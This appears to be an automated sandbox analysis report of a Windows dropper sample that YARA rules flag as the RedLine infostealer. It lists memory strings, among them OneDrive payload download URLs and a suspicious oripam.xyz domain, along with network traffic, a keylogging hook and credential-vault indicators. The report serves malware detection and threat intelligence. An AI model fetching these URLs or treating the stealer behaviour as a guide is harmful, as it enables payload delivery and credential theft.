Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://ocsp.sectigo.com0C
Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F7F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F8F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEDF000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://oripam.xyz
Source: srcngmlC.pif, 00000005.00000002.1876165964.0000000030227000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003004F000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0G
Source: srcngmlC.pif, 00000005.00000002.1876165964.0000000030227000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003004F000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1708520498.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1681956629.0000000022551000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1682687395.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705852154.00000000225FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1838777437.0000000002A16000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1907994741.0000000002A96000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif.0.dr	String found in binary or memory: http://www.pmail.com0
Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353A8000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1881543836.0000000036210000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353A8000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: srcngmlC.pif, 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: srcngmlC.pif, 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/
Source: Clmgncrs.PIF, 00000006.00000003.1833585649.00000000007D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/G
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000938000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: Clmgncrs.PIF, 00000009.00000002.1906761874.0000000002950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=31BDC6BCA3597F9E%21304&authkey=
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.0000000000764000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679908372.000000000073E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1682330208.0000000000765000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypfgrg.sn.files.1drv.com/
Source: Clmgncrs.PIF, 00000006.00000003.1833585649.00000000007D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypfgrg.sn.files.1drv.com/D
Source: Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypfgrg.sn.files.1drv.com/h
Source: Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypfgrg.sn.files.1drv.com/y4m7fJhE-49Pt4dSp9jiqldsLsML_i9iJ0IU-qjBsvNj8FZRj4pBDSp-HX0gkJLIgC5
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679908372.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypfgrg.sn.files.1drv.com/y4mbejU0zcnLb8KIWNqfLsU3N_rsqNxx32XcbH8LaSJJsucoEjYDeg2UbWhApyywdOR
Source: Clmgncrs.PIF, 00000006.00000002.1836211826.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1836211826.00000000007AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypfgrg.sn.files.1drv.com/y4msDhUEASrFMIPv49fXAzT4qs4bguIHP4CCd0btJ0hrPPN2V-ZqBRXsYtcVL3jQXO7
Source: Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000997000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypfgrg.sn.files.1drv.com/y4msfS_e270PF1WCCn3T5ASjYfsXiOpfH10UgaOZ4PL-nRYDMKHbDGEjKzr8Rs0CmTq
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.0000000000741000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679908372.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypfgrg.sn.files.1drv.com:443/y4mbejU0zcnLb8KIWNqfLsU3N_rsqNxx32XcbH8LaSJJsucoEjYDeg2UbWhApyy
Source: Clmgncrs.PIF, 00000006.00000003.1833585649.00000000007A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypfgrg.sn.files.1drv.com:443/y4msDhUEASrFMIPv49fXAzT4qs4bguIHP4CCd0btJ0hrPPN2V-ZqBRXsYtcVL3j
Source: Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ypfgrg.sn.files.1drv.com:443/y4msfS_e270PF1WCCn3T5ASjYfsXiOpfH10UgaOZ4PL-nRYDMKHbDGEjKzr8Rs0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.231.16.75:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.231.16.75:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.231.16.75:443 -> 192.168.2.4:49750 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, POq2Ux.cs

.Net Code: hntEgWA

Installs a global keyboard hook

Source: C:\Users\Public\Libraries\srcngmlC.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\srcngmlC.pif			Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\srcngmlC.pif

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_029F4F7C GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

0_2_029F4F7C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_02A0F140 GetMessagePos,GetKeyboardState,

0_2_02A0F140

Source: C:\Users\Public\Libraries\srcngmlC.pif	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.srcngmlC.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.srcngmlC.pif.3eeb5b90.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.srcngmlC.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.1.srcngmlC.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.srcngmlC.pif.31c600c6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.srcngmlC.pif.34490ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.srcngmlC.pif.32f65b90.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.srcngmlC.pif.34490ee8.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.srcngmlC.pif.34490000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.srcngmlC.pif.32f55b90.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
